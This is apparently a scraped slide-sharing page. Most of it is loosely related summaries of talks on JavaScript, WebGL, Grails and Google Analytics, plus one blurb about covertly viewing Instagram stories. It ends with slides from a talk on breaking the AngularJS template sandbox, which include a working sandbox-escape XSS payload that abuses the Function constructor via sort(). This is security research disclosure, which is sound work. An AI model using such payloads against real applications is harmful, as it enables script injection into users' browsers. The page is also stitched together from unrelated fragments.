As developers, we know what good and bad JavaScript APIs "feel" like, and yet we struggle with designing the kind of APIs that we enjoy using. But principles of good JavaScript API design do exist, and it's possible to extract them from several key libraries in the proliferating JavaScript landscape. In this session, Brandon Satrom will do exactly that, digging into the design aspects of popular libraries like jQuery, Backbone, Knockout, Modernizr, Kendo UI and others to enumerate the designed-in qualities of these libraries that make them not only popular, but a pleasure to use.
The document appears to be a presentation about using jQuery with SharePoint. It discusses open wireless access being available and encourages attendees to tweet about the session and blog. It then provides information about the presenter and their background as well as an outline of the topics to be covered in the presentation, including what jQuery is, how to deploy and develop with it, interacting with SharePoint and the DOM, reading and writing list data, using third party libraries, and demos.
Leaving Flatland: Getting Started with WebGL - SXSW 2012 - philogb
This document discusses getting started with WebGL. It begins with an introduction to WebGL, explaining that it allows 3D graphics in browsers similarly to OpenGL. It then provides examples of what can be done with WebGL, such as data visualization, games, 3D modeling, and more. The document proceeds to explain the basic graphics pipeline and JavaScript API used in WebGL. It concludes by discussing how to set up a basic 3D scene and choose a WebGL library like Three.js or PhiloGL to get started creating WebGL applications.
1) Rachel Andrew discusses considerations when choosing tools and frameworks for front-end development projects, emphasizing progressive enhancement and ensuring the core experience works for all.
2) She argues against over-reliance on frameworks, which can mask issues and prevent learning core skills. Frameworks should be used lightly and evaluated on a case-by-case basis.
3) Andrew talks about the importance of standards-based development and contributing to emerging specifications like CSS Grid Layout, rather than depending entirely on pre-processors. Her goal is to encourage continued progress of the open web.
JavaScript basics
JavaScript event loop
Ajax and promises
DOM interaction
JavaScript object orientation
Web Workers
Useful Microframeworks
This presentation has been developed in the context of the Mobile Applications Development course, DISIM, University of L'Aquila (Italy), Spring 2015.
http://www.ivanomalavolta.com
This document provides an overview of the Grails web framework, including comparisons to other Java web frameworks. It discusses the differences between static and dynamic programming languages and covers Groovy and Grails features such as conventions over configuration, object relational mapping, validation, security, and common tags. The document also provides information on Grails project structure, configuration, and popular plugins.
Similar to Breaking AngularJS Javascript sandbox (20)
Meet up Milano 14 _ Axpo Italia_ Migration from Mule3 (On-prem) to.pdf - Florence Consulting
Fourteenth Milan Meetup, held in Milan on 23 May 2024 from 17:00 to 18:30, in person and remotely.
We talked about how Axpo Italia S.p.A. reduced its technical debt by migrating its APIs from Mule 3.9 to Mule 4.4, also moving from on-premises to CloudHub 1.0.
Instagram has become one of the most popular social media platforms, allowing people to share photos, videos, and stories with their followers. Sometimes, though, you might want to view someone's story without them knowing.
Gen Z and the marketplaces - let's translate their needs - Laura Szabó
The product workshop focused on exploring the requirements of Generation Z in relation to marketplace dynamics. We delved into their specific needs, examined the specifics in their shopping preferences, and analyzed their preferred methods for accessing information and making purchases within a marketplace. Through the study of real-life cases , we tried to gain valuable insights into enhancing the marketplace experience for Generation Z.
The workshop was held on the DMA Conference in Vienna June 2024.
Understanding User Behavior with Google Analytics.pdf - SEO Article Boost
Unlocking the full potential of Google Analytics is crucial for understanding and optimizing your website’s performance. This guide dives deep into the essential aspects of Google Analytics, from analyzing traffic sources to understanding user demographics and tracking user engagement.
Traffic Sources Analysis:
Discover where your website traffic originates. By examining the Acquisition section, you can identify whether visitors come from organic search, paid campaigns, direct visits, social media, or referral links. This knowledge helps in refining marketing strategies and optimizing resource allocation.
User Demographics Insights:
Gain a comprehensive view of your audience by exploring demographic data in the Audience section. Understand age, gender, and interests to tailor your marketing strategies effectively. Leverage this information to create personalized content and improve user engagement and conversion rates.
Tracking User Engagement:
Learn how to measure user interaction with your site through key metrics like bounce rate, average session duration, and pages per session. Enhance user experience by analyzing engagement metrics and implementing strategies to keep visitors engaged.
Conversion Rate Optimization:
Understand the importance of conversion rates and how to track them using Google Analytics. Set up Goals, analyze conversion funnels, segment your audience, and employ A/B testing to optimize your website for higher conversions. Utilize ecommerce tracking and multi-channel funnels for a detailed view of your sales performance and marketing channel contributions.
Custom Reports and Dashboards:
Create custom reports and dashboards to visualize and interpret data relevant to your business goals. Use advanced filters, segments, and visualization options to gain deeper insights. Incorporate custom dimensions and metrics for tailored data analysis. Integrate external data sources to enrich your analytics and make well-informed decisions.
This guide is designed to help you harness the power of Google Analytics for making data-driven decisions that enhance website performance and achieve your digital marketing objectives. Whether you are looking to improve SEO, refine your social media strategy, or boost conversion rates, understanding and utilizing Google Analytics is essential for your success.
2. What is AngularJS? And where’s the sandbox?
• Javascript framework for building single page web applications.
• Mustache style templates: Having <h1>{{1+2+3}}</h1> anywhere in an Angular HTML app will render <h1>6</h1>
• Template expressions are evaluated with Javascript
• Template expression Javascript is sandboxed - It can’t reach [object Window] or DOM
• If we could access dangerous objects from templates, we could XSS any AngularJS app that prints user data in Angular bound HTML
3. Executing JS… From JS
• eval() - Unavailable under window
• document.write - Unavailable under document
• location=“javascript:” - Unavailable under document
• Function(“code”)() - Unavailable under blacklist
• What else is there?
5. The how
if(compareFunction(element1, element2) == 1){
  //sort element as bigger
}else if(… == 0){
  //sort element as same
}else{
  //sort element as smaller
}

if(toString.constructor("a","alert(1)") == 1){
if((function(a){alert(1)}).toString() == 1..toString()){
if((function(a){alert(1)}).call() == 1..toString()){

{{toString.constructor.prototype.toString = toString.constructor.prototype.call;
["a","alert(1)"].sort(toString.constructor)}}
alert(1)